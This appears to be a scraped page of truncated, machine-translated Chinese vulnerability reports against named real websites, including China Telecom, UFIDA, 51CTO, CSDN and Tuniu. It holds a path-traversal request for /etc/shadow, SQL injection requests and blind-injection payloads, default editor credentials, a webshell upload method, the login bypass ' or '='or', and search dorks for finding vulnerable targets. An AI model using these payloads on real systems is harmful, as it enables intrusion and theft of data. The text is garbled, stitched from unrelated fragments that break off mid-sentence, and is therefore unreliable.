best website vulnerability scanner

SQL Injection + File Inclusion Vulnerability in a website of China Telecom Rear one: http://rs.hntelecom.net.cn/HRSystem/initIndex.doBACKGROUND Two: http://rs.hntelecom.net.cn/loginadmin.do? M = loginVulnerability Type 1:The file contains: rs.hntelecom.net.cn/filedown.do? M = filedown path = /.. /.. //.. /.. //.. /.. //.. /.. //.. /.. // etc/shadow % 00 No. root permission.Vulnerability Type 2:Address: rs.

A website vulnerability in UFIDA may cause a large amount of internal information leakage (employee name/mobile phone/email, etc) RT SQL injection is detected here. Scanned. Don't scan don't know, a scan scared You can see a SHELL. TXT file and a shell. asp file with the same name. Open the shell.txt file and see a password. After the connection, An ASPX Trojan is uploaded. Http://hcm.yonyou.com/cao.aspx

51CTO technical website has SQL Injection Vulnerability Detailed description: POST/salary/show. php HTTP/1.1Content-Length: Your content-type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://fellow.51cto.comHost: fellow.51cto. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) chrome

A website in CSDN has the SQL blind injection vulnerability. Http://edu.csdn.net/courses? Attr = 3 c_id = 0 level = 1 payload: blind Note 1 = 1 Parameter: level (GET) Type: boolean-based blind Title: AND boolean-based blind-WHERE or HAVING clause Payload: attr = 3 c_id = 0 level = 1 AND 2659 = 2659 Type: AND/OR time-based blind Title: MySQL> = 5.0.12 AND time-based blind (SELECT) Payload: attr = 3 c_id

Editor vulnerability Default background ubbcode/admin_login.aspDatabase ubbcode/db/ewebeditor. mdbDefault Account Password yzm 111111Webshell MethodLog on to the background and click "style management"-select the new style to write only the style names: scriptkiddiesCasual write path mode: Select absolute path image type: gif | jpg | jpeg | bmp asp | asa | aaspsp | cer | cdxThe image type is, for example, the ASP Trojan format to be uploaded.Upload pa

360 security Browser Remote Command Execution Vulnerability (malicious software can be implanted when accessing any website) The test environment is Windows 7 + 360. The latest version is as follows: 360 The Security browser supports two types of extensions:1. For chrome extensions similar to http: // **. **/ext/xxx. crx, you must confirm the installation process;2. For private 360 applications similar to

The SQL injection vulnerability exists on a website of touniu tourism network. POST/ajax/membercard HTTP/1.1Content-Length: 149Content-Type: application/x-www-form-urlencodedX-Requested-With: Signature: http://passport.tuniu.comCookie: PASSPORTSESSID = signature; login_user_name = rslydfdvHost: passport. tuniu. comConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1

For Shell, power test, do not maliciously destroyXusoft System:Background Universal password: ' or ' = ' or ' can be directly logged in, backstage address/manage/login.aspInurl:readarticlemb.asp?id=Inurl:readbigclassmb.asp?id=Inurl:readbigclassmbnews.asp?id=UPUPW Green Server Platform:The server is basically 2008,system permissionsMySQL default username Password: root, enter the background directly execute SQL statement write ShellPHP probe -UPUPW Green Server platform kangle Special Edition ©

Program name: Network PHP Enterprise website Management System 2.0 free versionThe following is a brief description of the system's features:1, the use of DIV+CSS layout tested compatible with IE and Firefox mainstream browser, other browsers have not been tested.2, product news level three unlimited classification.3, backstage can set up such as Administrator account password, site title, the bottom of the site copyright and other information.4. Back

Author: pizzaviat Source: Eighth Regiment How to better achieve the prevention of hacker attacks, I mention personal views! First, the free program does not really have a fee, since you can share the original code, then the attacker can analyze the code. If you pay attention to precautions in detail, your site's security will be greatly improved. Even if there are vulnerabilities such as SQL injection, attackers will not be able to take your site immediately. Due to the ease of use of ASP, more